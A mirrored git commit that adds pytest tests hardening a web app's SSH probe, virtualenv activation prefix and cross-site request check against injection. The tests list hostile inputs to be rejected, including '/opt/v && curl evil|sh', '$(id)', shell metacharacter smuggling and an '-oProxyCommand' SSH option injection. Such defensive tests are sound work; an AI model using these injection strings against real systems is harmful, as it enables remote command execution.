mirror of
https://github.com/pewdiepie-archdaemon/odysseus.git
synced 2026-06-15 17:25:26 -04:00
Harden Cookbook package SSH probe
This commit is contained in:
@@ -7,12 +7,17 @@ import sys
|
||||
from pathlib import Path
|
||||
from types import SimpleNamespace
|
||||
|
||||
import pytest
|
||||
|
||||
from routes.shell_routes import (
|
||||
_find_line_break,
|
||||
_running_in_container,
|
||||
_docker_row_status,
|
||||
_package_installed_from_probe,
|
||||
_package_status_note,
|
||||
_reject_cross_site,
|
||||
_ssh_base_argv,
|
||||
_venv_activate_prefix,
|
||||
DOCKER_IN_CONTAINER_HINT,
|
||||
)
|
||||
|
||||
@@ -241,3 +246,76 @@ class TestPackageProbeStatus:
|
||||
|
||||
assert _package_installed_from_probe("diffusers", missing_torch) is False
|
||||
assert _package_installed_from_probe("diffusers", ready) is True
|
||||
|
||||
|
||||
class TestSshBaseArgv:
|
||||
def test_basic_host_no_port(self):
|
||||
assert _ssh_base_argv("user@example.com", None) == [
|
||||
"ssh", "-o", "ConnectTimeout=6", "-o", "StrictHostKeyChecking=no",
|
||||
"user@example.com",
|
||||
]
|
||||
|
||||
def test_default_port_22_omitted(self):
|
||||
assert "-p" not in _ssh_base_argv("h", "22")
|
||||
assert "-p" not in _ssh_base_argv("h", "")
|
||||
assert "-p" not in _ssh_base_argv("h", None)
|
||||
|
||||
def test_custom_port_added_as_separate_argv(self):
|
||||
assert _ssh_base_argv("h", "2222")[-3:] == ["-p", "2222", "h"]
|
||||
|
||||
@pytest.mark.parametrize("bad", ["0", "70000", "-1", "8a", "$(id)", "22 22"])
|
||||
def test_bad_port_rejected(self, bad):
|
||||
with pytest.raises(ValueError):
|
||||
_ssh_base_argv("h", bad)
|
||||
|
||||
def test_option_injecting_host_rejected(self):
|
||||
with pytest.raises(ValueError):
|
||||
_ssh_base_argv("-oProxyCommand=touch /tmp/pwn", None)
|
||||
|
||||
@pytest.mark.parametrize("bad", ["", " ", None])
|
||||
def test_empty_host_rejected(self, bad):
|
||||
with pytest.raises(ValueError):
|
||||
_ssh_base_argv(bad, None)
|
||||
|
||||
|
||||
class TestVenvActivatePrefix:
|
||||
def test_empty_returns_blank(self):
|
||||
assert _venv_activate_prefix(None) == ""
|
||||
assert _venv_activate_prefix("") == ""
|
||||
|
||||
def test_appends_bin_activate(self):
|
||||
assert _venv_activate_prefix("~/venv") == ". ~/venv/bin/activate && "
|
||||
|
||||
def test_already_pointing_at_activate(self):
|
||||
assert _venv_activate_prefix("/opt/v/bin/activate") == ". /opt/v/bin/activate && "
|
||||
|
||||
@pytest.mark.parametrize("bad", [
|
||||
"/opt/v && curl evil|sh",
|
||||
"$(id)",
|
||||
"`id`",
|
||||
"v;id",
|
||||
"v\nid",
|
||||
"v|id",
|
||||
])
|
||||
def test_injection_payloads_rejected(self, bad):
|
||||
with pytest.raises(ValueError):
|
||||
_venv_activate_prefix(bad)
|
||||
|
||||
|
||||
class TestRejectCrossSite:
|
||||
@staticmethod
|
||||
def _req(headers):
|
||||
return SimpleNamespace(headers=headers)
|
||||
|
||||
def test_cross_site_rejected(self):
|
||||
from fastapi import HTTPException
|
||||
with pytest.raises(HTTPException) as exc:
|
||||
_reject_cross_site(self._req({"sec-fetch-site": "cross-site"}))
|
||||
assert exc.value.status_code == 403
|
||||
|
||||
@pytest.mark.parametrize("site", ["same-origin", "same-site", "none"])
|
||||
def test_same_origin_and_direct_nav_allowed(self, site):
|
||||
assert _reject_cross_site(self._req({"sec-fetch-site": site})) is None
|
||||
|
||||
def test_missing_header_allowed(self):
|
||||
assert _reject_cross_site(self._req({})) is None
|
||||
|
||||
Reference in New Issue
Block a user